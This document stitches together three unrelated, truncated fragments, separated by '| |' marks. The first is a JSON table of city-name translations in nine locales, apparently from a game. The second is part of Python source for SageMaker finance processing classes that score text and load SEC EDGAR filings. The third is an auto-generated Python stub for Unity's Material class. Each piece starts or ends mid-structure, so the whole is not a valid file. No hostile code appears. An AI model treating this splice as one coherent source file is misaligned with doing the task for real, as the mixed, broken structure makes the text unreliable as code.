"ja_JP": "青森",
"ko_KR": "아오모리",
"pl_PL": "Aomori",
"pt_BR": "Aomori",
"ru_RU": "Аомори"
},
"APELDOORN": {
"de_DE": "Apeldoorn",
"es_ES": "Apeldoorn",
"fr_FR": "Apeldoorn",
"it_IT": "Apeldoorn",
"ja_JP": "アペルドールン",
"ko_KR": "아펠도른",
"pl_PL": "Apeldoorn",
"pt_BR": "Apeldoorn",
"ru_RU": "Апелдорн"
},
"APOLLONIA": {
"de_DE": "Apollonia",
"es_ES": "Apolonia",
"fr_FR": "Apollonia",
"it_IT": "Apollonia",
"ja_JP": "アポロニア",
"ko_KR": "아폴로니아",
"pl_PL": "Apollonia",
"pt_BR": "Apolônia",
"ru_RU": "Аполлония"
},
"APOLYTON": {
"de_DE": "Apolyton",
"es_ES": "Apolyton",
"fr_FR": "Apolyton",
"it_IT": "Apolyton",
"ja_JP": "アポリュトン",
"ko_KR": "아폴리튼",
"pl_PL": "Apolyton",
"pt_BR": "Apolyton",
"ru_RU": "Аполитон"
},
"APU": {
"de_DE": "Apu",
"es_ES": "Apu",
"fr_FR": "Apu",
"it_IT": "Apu",
"ja_JP": "アプ",
"ko_KR": "아푸",
"pl_PL": "Apu",
"pt_BR": "Apu",
"ru_RU": "Апу"
},
"AQABA": {
"de_DE": "Akaba",
"es_ES": "Áqaba",
"fr_FR": "Aqaba",
"it_IT": "Aqaba",
"ja_JP": "アカバ",
"ko_KR": "아카바",
"pl_PL": "Akwaba",
"pt_BR": "Aqaba",
"ru_RU": "Акаба"
},
"AQUILEIA": {
"de_DE": "Aquileia",
"es_ES": "Aquileia",
"fr_FR": "Aquileia",
"it_IT": "Aquileia",
"ja_JP": "アクイレイア",
"ko_KR": "아퀼레이아",
"pl_PL": "Akwileja",
"pt_BR": "Aquileia",
"ru_RU": "Аквилея"
},
"ARACAJU": {
"de_DE": "Aracaju",
"es_ES": "Aracaju",
"fr_FR": "Aracaju",
"it_IT": "Aracaju",
"ja_JP": "アラカジュ",
"ko_KR": "아라카주",
"pl_PL": "Aracaju",
"pt_BR": "Aracaju",
"ru_RU": "Аракажу"
},
"ARAWAN": {
"de_DE": "Arawan",
"es_ES": "Arawan",
"fr_FR": "Arawan",
"it_IT": "Arawan",
"ja_JP": "アラワン",
"ko_KR": "아라완",
"pl_PL": "Arawan",
"pt_BR": "Arawan",
"ru_RU": "Араван"
},
"ARCADIOPOLIS": {
"de_DE": "Arkadiopolis",
"es_ES": "Arcadiópolis",
"fr_FR": "Arcadiopolis",
"it_IT": "Arcadiopoli",
"ja_JP": "アルカディオポリス",
"ko_KR": "아르카디오폴리스",
"pl_PL": "Arcadiopolis",
"pt_BR": "Arcadiopolis",
"ru_RU": "Аркадиополь"
},
"AREGENUA": {
"de_DE": "Aregenua",
"es_ES": "Aregenua",
"fr_FR": "Aregenua",
"it_IT": "Aregenua",
"ja_JP": "アレゲヌア",
"ko_KR": "아레헤누아",
"pl_PL": "Aregenua",
"pt_BR": "Aregenua",
"ru_RU": "Арегенуя"
},
"ARGOS": {
"de_DE": "Argos",
"es_ES": "Argos",
"fr_FR": "Argos",
"it_IT": "Argo",
"ja_JP": "アルゴス",
"ko_KR": "아르고스",
"pl_PL": "Argos",
"pt_BR": "Argos",
"ru_RU": "Аргос"
},
"ARKHANGELSK": {
"de_DE": "Archangelsk",
"es_ES": "Arkhangelsk",
"fr_FR": "Arkhangelsk",
"it_IT": "Arkhangelsk",
"ja_JP": "アルハンゲリスク",
"ko_KR": "아르한겔스크",
"pl_PL": "Archangielsk",
"pt_BR": "Arkhangelsk",
"ru_RU": "Архангельск"
},
"ARMAGH": {
"de_DE": "Armagh",
"es_ES": "Armagh",
"fr_FR": "Armagh",
"it_IT": "Armagh",
"ja_JP": "アーマー",
"ko_KR": "아마",
"pl_PL": "Armagh",
"pt_BR": "Armagh",
"ru_RU": "Арма"
},
"ARNHEM": {
"de_DE": "Arnheim",
"es_ES": "Arnhem",
"fr_FR": "Arnhem",
"it_IT": "Arnhem",
"ja_JP": "アーネム",
"ko_KR": "아른험",
"pl_PL": "Arnhem",
"pt_BR": "Arnhem",
"ru_RU": "Арнем"
},
"ARPINUM": {
"de_DE": "Arpinum",
"es_ES": "Arpinum",
"fr_FR": "Arpinum",
"it_IT": "Arpino",
"ja_JP": "アルピヌム",
"ko_KR": "아르피움",
"pl_PL": "Arpinum",
"pt_BR": "Arpinum",
"ru_RU": "Арпин"
},
"ARRETIUM": {
"de_DE": "Arretium",
"es_ES": "Arretium",
"fr_FR": "Arretium",
"it_IT": "Arezzo",
"ja_JP": "アレティウム",
"ko_KR": "아레티움",
"pl_PL": "Arretium",
"pt_BR": "Arretium",
"ru_RU": "Арреций"
},
"ARSINOE": {
"de_DE": "Arsinoe",
"es_ES": "Arsínoe",
"fr_FR": "Arsinoé",
"it_IT": "Arsinoe",
"ja_JP": "アルシノエ",
"ko_KR": "아르시노에",
"pl_PL": "Arsinoe",
"pt_BR": "Arsinoe",
"ru_RU": "Арсиноя"
},
"ARTASHAT": {
"de_DE": "Artaschat",
"es_ES": "Artashat",
"fr_FR": "Artashat",
"it_IT": "Artashat",
"ja_JP": "アルタシャト",
"ko_KR": "아르타샷",
"pl_PL": "Artaszat",
"pt_BR": "Artaxata",
"ru_RU": "Арташат"
},
"ARTAXATA": {
"de_DE": "Artaxata",
"es_ES": "Artaxata",
"fr_FR": "Artaxata",
"it_IT": "Artaxata",
"ja_JP": "アルタクサタ",
"ko_KR": "아르탁사타",
"pl_PL": "Artaszat",
"pt_BR": "Artaxata",
"ru_RU": "Арташат"
},
"ARUBA": {
"de_DE": "Aruba",
"es_ES": "Aruba",
"fr_FR": "Aruba",
"it_IT": "Aruba",
"ja_JP": "アルバ",
"ko_KR": "아루바",
"pl_PL": "Aruba",
"pt_BR": "Aruba",
"ru_RU": "Аруба"
},
"ARZHAN": {
"de_DE": "Arschan",
"es_ES": "Arzhan",
"fr_FR": "Arzhan",
"it_IT": "Arzhan",
"ja_JP": "アルジャアン",
"ko_KR": "아르잔",
"pl_PL": "Arżan",
"pt_BR": "Arzhan",
"ru_RU": "Аржан"
},
"AR_RAQQAH": {
"de_DE": "Ar-Raqqa",
"es_ES": "Ar-Raqqah",
"fr_FR": "Racca",
"it_IT": "Ar-Raqqah",
"ja_JP": "アル=ラッカ",
"ko_KR": "아르라카",
"pl_PL": "Ar-Raqqah",
"pt_BR": "Ar-Raqqah",
"ru_RU": "Эр-Ракка"
},
"ASSEN": {
"de_DE": "Assen",
"es_ES": "Assen",
"fr_FR": "Assen",
"it_IT": "Assen",
"ja_JP": "アッセン",
"ko_KR": "아선",
"pl_PL": "Assen",
"pt_BR": "Assen",
"ru_RU": "Ассен"
},
"ASTRAKHAN": {
"de_DE": "Astrachan",
"es_ES": "Astracán",
"fr_FR": "Astrakhan",
"it_IT": "Astrakhan",
"ja_JP": "アストラハン",
"ko_KR": "아스트라한",
"pl_PL": "Astrachań",
"pt_BR": "Astracã",
"ru_RU": "Астрахань"
},
"ASYUT": {
"de_DE": "Asyut",
"es_ES": "Asiut",
"fr_FR": "Asyut",
"it_IT": "Asyut",
"ja_JP": "アシュート",
"ko_KR": "아시우트",
"pl_PL": "Asjut",
"pt_BR": "Assiut",
"ru_RU": "Асьют"
},
"ATHENS": {
"de_DE": "Athen",
"es_ES": "Atenas",
"fr_FR": "Athènes",
"it_IT": "Atene",
"ja_JP": "アテネ",
"ko_KR": "아테네",
"pl_PL": "Ateny",
"pt_BR": "Atenas",
"ru_RU": "Афины"
},
"ATLANTA": {
"de_DE": "Atlanta",
"es_ES": "Atlanta",
"fr_FR": "Atlanta",
"it_IT": "Atlanta",
"ja_JP": "アトランタ",
"ko_KR": "애틀란타",
"pl_PL": "Atlanta",
"pt_BR": "Atlanta",
"ru_RU": "Атланта"
},
"ATTALEA": {
"de_DE": "Attalea",
"es_ES": "Attalea",
"fr_FR": "Attaleia",
"it_IT": "Attalea",
"ja_JP": "アッタレア",
"ko_KR": "아탈레아",
"pl_PL": "Attalea",
"pt_BR": "Attalea",
"ru_RU": "Атталея"
},
"ATZCAPOTZALCO": {
"de_DE": "Atzcapotzalco",
"es_ES": "Atzcapotzalco",
"fr_FR": "Atzcapotzalco",
"it_IT": "Atzcapotzalco",
"ja_JP": "アスカポツァルコ",
"ko_KR": "아츠카포찰코",
"pl_PL": "Atzcapotzalco",
"pt_BR": "Atzcapotzalco",
"ru_RU": "Аскапоцалько"
},
"AUCKLAND": {
"de_DE": "Auckland",
"es_ES": "Auckland",
"fr_FR": "Auckland",
"it_IT": "Auckland",
"ja_JP": "オークランド",
"ko_KR": "오클랜드",
"pl_PL": "Auckland",
"pt_BR": "Auckland",
"ru_RU": "Окленд"
},
"AUGSBURG": {
"de_DE": "Augsburg",
"es_ES": "Augsburgo",
"fr_FR": "Augsbourg",
"it_IT": "Augusta",
"ja_JP": "アウクスブルク",
"ko_KR": "아우크스부르크",
"pl_PL": "Augsburg",
"pt_BR": "Augsburgo",
"ru_RU": "Аугсбург"
},
"AUTRICUM": {
"de_DE": "Autricum",
"es_ES": "Autricum",
"fr_FR": "Autricum",
"it_IT": "Autricum",
"ja_JP": "アウトリクム",
"ko_KR": "아우트리쿰",
"pl_PL": "Autricum",
"pt_BR": "Autricum",
"ru_RU": "Аутрикум"
},
"AVALDSNES": {
"de_DE": "Avaldsnes",
"es_ES": "Avaldsnes",
"fr_FR": "Avaldsnes",
"it_IT": "Avaldsnes",
"ja_JP": "アバルドネス",
"ko_KR": "아발스네스",
"pl_PL": "Avaldsnes",
"pt_BR": "Avaldsnes",
"ru_RU": "Авальдснес"
},
"AVARICUM": {
"de_DE": "Avaricum",
"es_ES": "Avárico",
"fr_FR": "Avaricum",
"it_IT": "Avaricum",
"ja_JP": "アウァリクム",
"ko_KR": "아바리쿰",
"pl_PL": "Avaricum",
"pt_BR": "Avaricum",
"ru_RU": "Аварикум"
},
"AVIGNON": {
"de_DE": "Avignon",
"es_ES": "Aviñón",
"fr_FR": "Avignon",
"it_IT": "Avignone",
"ja_JP": "アヴィニョン",
"ko_KR": "아비뇽",
"pl_PL": "Awinion",
"pt_BR": "Avignon",
"ru_RU": "Авиньон"
},
"AWDAGHUST": {
"de_DE": | |
and phrases that are related to the provided
word lists will receive high scores while text that is unrelated will score lower.
The NLP scores report the percentage of words in a document that match
a list of words, which is called lexicon.
The matching is undertaken after stemming of the document and the lexicon.
NLP scoring of sentiment is based on the Vader sentiment lexicon.
NLP Scoring of readability is based on the Gunning-Fog index.
For the general processing job configuration parameters of this class,
see the parameters in the
:class:`~smjsindustry.finance.processor.FinanceProcessor` class.
"""
def __init__(
self,
role: str,
instance_count: int,
instance_type: str,
volume_size_in_gb: int = 30,
volume_kms_key: str = None,
output_kms_key: str = None,
max_runtime_in_seconds: int = None,
sagemaker_session: sagemaker.session.Session = None,
tags: List[Dict[str, str]] = None,
network_config: sagemaker.network.NetworkConfig = None,
):
"""Initializes an NLPScorer instance to calculate NLP scores for text.
Args:
role (str): An AWS IAM role name or ARN. Amazon SageMaker Processing
uses this role to access AWS resources, such as
data stored in Amazon S3.
instance_count (int): The number of instances to run
a processing job with.
instance_type (str): The type of EC2 instance to use for
processing, for example, 'ml.c4.xlarge'.
volume_size_in_gb (int): Size in GB of the EBS volume
to use for storing data during processing (default: 30).
volume_kms_key (str): A KMS key for the processing
volume (default: None).
output_kms_key (str): The KMS key ID for processing job outputs (default: None).
max_runtime_in_seconds (int): Timeout in seconds (default: None).
After this amount of time, Amazon SageMaker terminates the job,
regardless of its current status. If `max_runtime_in_seconds` is not
specified, the default value is 24 hours.
sagemaker_session (:class:`~sagemaker.session.Session`):
Session object which manages interactions with Amazon SageMaker and
any other AWS services needed. If not specified, the processor creates
one using the default AWS configuration chain.
tags (List[Dict[str, str]]): List of tags to be passed to the processing job
(default: None). For more, see
https://docs.aws.amazon.com/sagemaker/latest/dg/API_Tag.html.
network_config (:class:`~sagemaker.network.NetworkConfig`):
A :class:`~sagemaker.network.NetworkConfig`
object that configures network isolation, encryption of
inter-container traffic, security group IDs, and subnets.
"""
super(NLPScorer, self).__init__(
role,
instance_count,
instance_type,
volume_size_in_gb=volume_size_in_gb,
volume_kms_key=volume_kms_key,
output_kms_key=output_kms_key,
max_runtime_in_seconds=max_runtime_in_seconds,
sagemaker_session=sagemaker_session,
tags=tags,
base_job_name=NLP_SCORE_JOB_NAME,
network_config=network_config,
)
def calculate(
self,
score_config: NLPScorerConfig,
text_column_name: str,
input_file_path: str,
s3_output_path: str,
output_file_name: str,
wait: bool = True,
logs: bool = True,
):
"""Runs a processing job to generate NLP scores for input text.
Args:
score_config (:class:`~smjsindustry.NLPScorerConfig`):
The config for the NLP scorer.
text_column_name (str): The name for column containing text to be summarized.
input_file_path (str): The input file path pointing to the input dataframe
containing the text to be summarized. It can be a local path or a S3 path.
s3_output_path (str): An S3 prefix in the format of
``'s3://<output bucket name>/output/path'``.
output_file_name (str): The output file name. The full path is
``'s3://<output bucket name>/output/path/output_file_name'``.
wait (bool): Whether the call should wait until the job completes (default: ``True``).
logs (bool): Whether to show the logs produced by the job (default: ``True``).
Raises:
ValueError: if ``logs`` is True but ``wait`` is False.
"""
parse_result = urlparse(s3_output_path)
if parse_result.scheme != "s3":
raise Exception(
"Expected an S3 prefix in the format of s3://<output bucket name>/output/path"
)
with tempfile.TemporaryDirectory() as tmpdirname:
score_config_file = os.path.join(tmpdirname, self._CONFIG_FILE)
with open(score_config_file, "w") as file_handle:
cloned_config = copy.deepcopy(score_config.get_config())
cloned_config["text_column_name"] = text_column_name
cloned_config["output_file_name"] = output_file_name
json.dump(cloned_config, file_handle)
config_input = ProcessingInput(
source=tmpdirname,
destination=self._PROCESSING_CONFIG,
input_name=self._CONFIG_INPUT_NAME,
s3_data_type="S3Prefix",
s3_input_mode="File",
s3_data_distribution_type="FullyReplicated",
s3_compression_type="None",
)
data_input = ProcessingInput(
source=input_file_path,
destination=self._PROCESSING_DATA,
input_name=self._DATA_INPUT_NAME,
s3_data_type="S3Prefix",
s3_input_mode="File",
s3_data_distribution_type="FullyReplicated",
s3_compression_type="None",
)
result_output = ProcessingOutput(
source=self._PROCESSING_OUTPUT,
destination=s3_output_path,
s3_upload_mode="EndOfJob",
)
logger.info("Starting SageMaker processing job to calculate NLP scores")
super().run(
inputs=[config_input, data_input],
outputs=[result_output],
wait=wait,
logs=logs,
)
logger.info("Completed SageMaker processing job to calculate NLP scores")
class DataLoader(FinanceProcessor):
"""Initializes a DataLoader instance to load a dataset.
For the general processing job configuration parameters of this class,
see the parameters in the
:class:`~smjsindustry.finance.processor.FinanceProcessor` class.
The following ``load`` class method with
:class:`~smjsindustry.finance.EDGARDataSetConfig`
downloads SEC XML filings from the `SEC EDGAR database <https://www.sec.gov/edgar/>`_
and parses the downloaded XML filings to plain text files.
"""
def __init__(
self,
role: str,
instance_count: int,
instance_type: str,
volume_size_in_gb: int = 30,
volume_kms_key: str = None,
output_kms_key: str = None,
max_runtime_in_seconds: int = None,
sagemaker_session: sagemaker.session.Session = None,
tags: List[Dict[str, str]] = None,
network_config: sagemaker.network.NetworkConfig = None,
):
"""Initializes a DataLoader instance to load data from the `SEC EDGAR database <https://www.sec.gov/edgar/>`_.
Args:
role (str): An AWS IAM role name or ARN. Amazon SageMaker Processing
uses this role to access AWS resources, such as
data stored in Amazon S3.
instance_count (int): The number of instances to run
a processing job with.
instance_type (str): The type of EC2 instance to use for
processing, for example, 'ml.c4.xlarge'.
volume_size_in_gb (int): Size in GB of the EBS volume
to use for storing data during processing (default: 30).
volume_kms_key (str): A KMS key for the processing
volume (default: None).
output_kms_key (str): The KMS key ID for processing job outputs (default: None).
max_runtime_in_seconds (int): Timeout in seconds (default: None).
After this amount of time, Amazon SageMaker terminates the job,
regardless of its current status. If `max_runtime_in_seconds` is not
specified, the default value is 24 hours.
sagemaker_session (:class:`~sagemaker.session.Session`):
Session object which manages interactions with Amazon SageMaker and
any other AWS services needed. If not specified, the processor creates
one using the default AWS configuration chain.
tags (List[Dict[str, str]]): List of tags to be passed to the processing job
(default: None). For more, see
https://docs.aws.amazon.com/sagemaker/latest/dg/API_Tag.html.
network_config (:class:`~sagemaker.network.NetworkConfig`):
A :class:`~sagemaker.network.NetworkConfig`
object that configures network isolation, encryption of
inter-container traffic, security group IDs, and subnets.
"""
if instance_count > 1:
logger.info("Dataloader processing jobs only support 1 instance.")
instance_count = 1
super(DataLoader, self).__init__(
role,
instance_count,
instance_type,
volume_size_in_gb=volume_size_in_gb,
volume_kms_key=volume_kms_key,
output_kms_key=output_kms_key,
max_runtime_in_seconds=max_runtime_in_seconds,
sagemaker_session=sagemaker_session,
tags=tags,
base_job_name=SEC_FILING_RETRIEVAL_JOB_NAME,
network_config=network_config,
)
def load(
self,
dataset_config: EDGARDataSetConfig,
s3_output_path: str,
output_file_name: str,
wait: bool = True,
logs: bool = True,
):
"""Runs a processing job to load dataset from `SEC EDGAR database <https://www.sec.gov/edgar/>`_.
Args:
dataset_config (:class:`~smjsindustry.finance.EDGARDataSetConfig`):
The config for the DataLoader.
s3_output_path (str): An S3 prefix in the format of
``'s3://<output bucket name>/output/path'``.
output_file_name (str): The output file name. The full path is
``'s3://<output bucket name>/output/path/output_file_name'``.
wait (bool): Whether the call should wait until the job completes (default: ``True``).
logs (bool): Whether to show the logs produced by the job (default: ``True``).
Raises:
ValueError: if ``logs`` is True but ``wait`` is False.
"""
parse_result = urlparse(s3_output_path)
if parse_result.scheme != "s3":
raise Exception(
"Expected an S3 prefix in the format of s3://<output bucket name>/output/path"
)
with tempfile.TemporaryDirectory() as tmpdirname:
dataset_config_file = os.path.join(tmpdirname, self._CONFIG_FILE)
with open(dataset_config_file, "w") as file_handle:
cloned_config = copy.deepcopy(dataset_config.get_config())
cloned_config["output_file_name"] = output_file_name
json.dump(cloned_config, file_handle)
config_input = ProcessingInput(
input_name=self._CONFIG_INPUT_NAME,
source=tmpdirname,
destination=self._PROCESSING_CONFIG,
s3_data_type="S3Prefix",
s3_input_mode="File",
s3_data_distribution_type="FullyReplicated",
s3_compression_type="None",
)
result_output = ProcessingOutput(
source=self._PROCESSING_OUTPUT,
destination=s3_output_path,
s3_upload_mode="EndOfJob",
)
logger.info("Starting SageMaker processing job to load dataset")
super().run(
inputs=[config_input],
outputs=[result_output],
wait=wait,
logs=logs,
)
logger.info("Completed SageMaker processing job to load dataset")
class SECXMLFilingParser(FinanceProcessor):
"""Initializes a SECXMLFilingParser instance that parses SEC XML filings.
For the general processing job configuration parameters of this class,
see the parameters in the
:class:`~smjsindustry.finance.processor.FinanceProcessor` class.
The following ``parse`` class method parses user-downloaded SEC XML filings
to plain text files.
"""
def __init__(
self,
role: str,
instance_count: int,
instance_type: str,
volume_size_in_gb: int = 30,
volume_kms_key: str = None,
output_kms_key: str = None,
max_runtime_in_seconds: int = None,
sagemaker_session: sagemaker.session.Session = None,
tags: List[Dict[str, str]] = None,
network_config: sagemaker.network.NetworkConfig = None,
):
"""Initializes a SECXMLFilingParser instance to parse the SEC XML filings.
Args:
role (str): An AWS IAM role name or ARN. Amazon SageMaker Processing
uses this role to access AWS resources, such as
data stored in Amazon S3.
instance_count (int): The number of instances to run
a processing job with.
instance_type (str): The type of EC2 instance to use for
processing, for example, 'ml.c4.xlarge'.
volume_size_in_gb (int): Size in GB of the EBS volume
to use for storing data during processing (default: 30).
volume_kms_key (str): A KMS key for the processing
volume (default: None).
output_kms_key (str): The KMS key ID for processing job | |
from typing import overload
from UdonPie import System
from UdonPie import UnityEngine
from UdonPie.Undefined import *
class Material:
def __new__(cls, arg1=None):
'''
:returns: Material
:rtype: UnityEngine.Material
'''
pass
@staticmethod
def op_Implicit(arg1):
'''
:param arg1: Object
:type arg1: UnityEngine.Object
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def op_Equality(arg1, arg2):
'''
:param arg1: Object
:type arg1: UnityEngine.Object
:param arg2: Object
:type arg2: UnityEngine.Object
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def op_Inequality(arg1, arg2):
'''
:param arg1: Object
:type arg1: UnityEngine.Object
:param arg2: Object
:type arg2: UnityEngine.Object
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
@overload
def SetTextureOffset(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Vector2
:type arg2: UnityEngine.Vector2
'''
pass
@staticmethod
@overload
def SetTextureOffset(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Vector2
:type arg2: UnityEngine.Vector2
'''
pass
@staticmethod
def SetTextureOffset(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetTextureScale(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Vector2
:type arg2: UnityEngine.Vector2
'''
pass
@staticmethod
@overload
def SetTextureScale(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Vector2
:type arg2: UnityEngine.Vector2
'''
pass
@staticmethod
def SetTextureScale(arg1=None, arg2=None):
pass
@staticmethod
@overload
def GetTextureOffset(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: Vector2
:rtype: UnityEngine.Vector2
'''
pass
@staticmethod
@overload
def GetTextureOffset(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:returns: Vector2
:rtype: UnityEngine.Vector2
'''
pass
@staticmethod
def GetTextureOffset(arg1=None):
pass
@staticmethod
@overload
def GetTextureScale(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: Vector2
:rtype: UnityEngine.Vector2
'''
pass
@staticmethod
@overload
def GetTextureScale(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:returns: Vector2
:rtype: UnityEngine.Vector2
'''
pass
@staticmethod
def GetTextureScale(arg1=None):
pass
@staticmethod
@overload
def SetFloat(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Single
:type arg2: System.Single or float
'''
pass
@staticmethod
@overload
def SetFloat(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Single
:type arg2: System.Single or float
'''
pass
@staticmethod
def SetFloat(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetInt(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Int32
:type arg2: System.Int32 or int
'''
pass
@staticmethod
@overload
def SetInt(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Int32
:type arg2: System.Int32 or int
'''
pass
@staticmethod
def SetInt(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetColor(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Color
:type arg2: UnityEngine.Color
'''
pass
@staticmethod
@overload
def SetColor(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Color
:type arg2: UnityEngine.Color
'''
pass
@staticmethod
def SetColor(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetVector(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Vector4
:type arg2: UnityEngine.Vector4
'''
pass
@staticmethod
@overload
def SetVector(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Vector4
:type arg2: UnityEngine.Vector4
'''
pass
@staticmethod
def SetVector(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetMatrix(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Matrix4x4
:type arg2: UnityEngine.Matrix4x4
'''
pass
@staticmethod
@overload
def SetMatrix(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Matrix4x4
:type arg2: UnityEngine.Matrix4x4
'''
pass
@staticmethod
def SetMatrix(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetTexture(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Texture
:type arg2: UnityEngine.Texture
'''
pass
@staticmethod
@overload
def SetTexture(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Texture
:type arg2: UnityEngine.Texture
'''
pass
@staticmethod
def SetTexture(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetBuffer(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: ComputeBuffer
:type arg2: UnityEngine.ComputeBuffer
'''
pass
@staticmethod
@overload
def SetBuffer(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: ComputeBuffer
:type arg2: UnityEngine.ComputeBuffer
'''
pass
@staticmethod
def SetBuffer(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetFloatArray(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def SetFloatArray(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def SetFloatArray(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: SingleArray
:type arg2: System.SingleArray
'''
pass
@staticmethod
@overload
def SetFloatArray(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: SingleArray
:type arg2: System.SingleArray
'''
pass
@staticmethod
def SetFloatArray(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetColorArray(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def SetColorArray(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def SetColorArray(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: ColorArray
:type arg2: UnityEngine.ColorArray
'''
pass
@staticmethod
@overload
def SetColorArray(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: ColorArray
:type arg2: UnityEngine.ColorArray
'''
pass
@staticmethod
def SetColorArray(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetVectorArray(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def SetVectorArray(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def SetVectorArray(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Vector4Array
:type arg2: UnityEngine.Vector4Array
'''
pass
@staticmethod
@overload
def SetVectorArray(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Vector4Array
:type arg2: UnityEngine.Vector4Array
'''
pass
@staticmethod
def SetVectorArray(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetMatrixArray(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def SetMatrixArray(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def SetMatrixArray(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Matrix4x4Array
:type arg2: UnityEngine.Matrix4x4Array
'''
pass
@staticmethod
@overload
def SetMatrixArray(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Matrix4x4Array
:type arg2: UnityEngine.Matrix4x4Array
'''
pass
@staticmethod
def SetMatrixArray(arg1=None, arg2=None):
pass
@staticmethod
@overload
def GetFloat(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: Single
:rtype: System.Single
'''
pass
@staticmethod
@overload
def GetFloat(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:returns: Single
:rtype: System.Single
'''
pass
@staticmethod
def GetFloat(arg1=None):
pass
@staticmethod
@overload
def GetInt(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: Int32
:rtype: System.Int32
'''
pass
@staticmethod
@overload
def GetInt(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:returns: Int32
:rtype: System.Int32
'''
pass
@staticmethod
def GetInt(arg1=None):
pass
@staticmethod
@overload
def GetColor(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: Color
:rtype: UnityEngine.Color
'''
pass
@staticmethod
@overload
def GetColor(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:returns: Color
:rtype: UnityEngine.Color
'''
pass
@staticmethod
def GetColor(arg1=None):
pass
@staticmethod
@overload
def GetVector(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: Vector4
:rtype: UnityEngine.Vector4
'''
pass
@staticmethod
@overload
def GetVector(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:returns: Vector4
:rtype: UnityEngine.Vector4
'''
pass
@staticmethod
def GetVector(arg1=None):
pass
@staticmethod
@overload
def GetMatrix(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: Matrix4x4
:rtype: UnityEngine.Matrix4x4
'''
pass
@staticmethod
@overload
def GetMatrix(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:returns: Matrix4x4
